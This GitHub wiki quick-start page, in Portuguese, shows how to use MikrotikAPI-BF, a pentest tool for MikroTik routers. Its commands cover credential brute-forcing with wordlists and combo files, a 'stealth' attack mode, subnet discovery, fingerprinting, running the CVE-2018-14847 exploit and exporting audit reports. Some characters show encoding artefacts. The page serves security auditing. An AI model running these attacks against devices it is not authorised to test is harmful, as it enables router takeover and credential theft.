Quick Start pt BR - mrhenrike/MikrotikAPI-BF GitHub Wiki

Inicio Rapido

Idioma: Portugues (pt-BR) ยท English

Obtenha seu primeiro resultado em menos de 60 segundos.


Passo 1 โ€” Clonar e Instalar

git clone https://github.com/mrhenrike/MikrotikAPI-BF.git
cd MikrotikAPI-BF
python -m venv .venv && source .venv/bin/activate  # Linux/macOS
python -m venv .venv && .venv\Scripts\activate      # Windows
pip install -r requirements.txt

Passo 2 โ€” Teste de Credencial Unica

python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P admin

Passo 3 โ€” Ataque com Wordlist

python mikrotikapi-bf.py -t 192.168.88.1 \
  -u examples/usernames.txt \
  -p examples/passwords.txt \
  --progress

Passo 4 โ€” Ataque com Combo File

python mikrotikapi-bf.py -t 192.168.88.1 -d examples/combos.txt --progress

Passo 5 โ€” Exportar Resultados

python mikrotikapi-bf.py -t 192.168.88.1 -d examples/combos.txt \
  --export-all \
  --audit-report \
  --progress

Fluxo Tipico de Pentest

# 1. Descobrir dispositivos Mikrotik na sub-rede
python mikrotikapi-bf.py --discover -n 192.168.1.0/24 --threads 50 --progress

# 2. Fingerprint do alvo
python mikrotikapi-bf.py -t 192.168.88.1 --fingerprint -v

# 3. Ataque furtivo com wordlist
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt --stealth --progress

# 4. Validacao de servicos pos-login
python mikrotikapi-bf.py -t 192.168.88.1 -U admin -P senha_encontrada \
  --validate ftp,ssh,telnet --progress

# 5. Exportar relatorio completo
python mikrotikapi-bf.py -t 192.168.88.1 -d combos.txt \
  --export-all --audit-report

# 6. Executar exploit especifico (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.88.1 --run-exploit CVE-2018-14847

# 7. Auditoria completa em 8 fases com SARIF (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.88.1 --audit -U admin -P senha_encontrada \
  --export sarif

Ver tambem: Exemplos de Uso ยท Referencia de API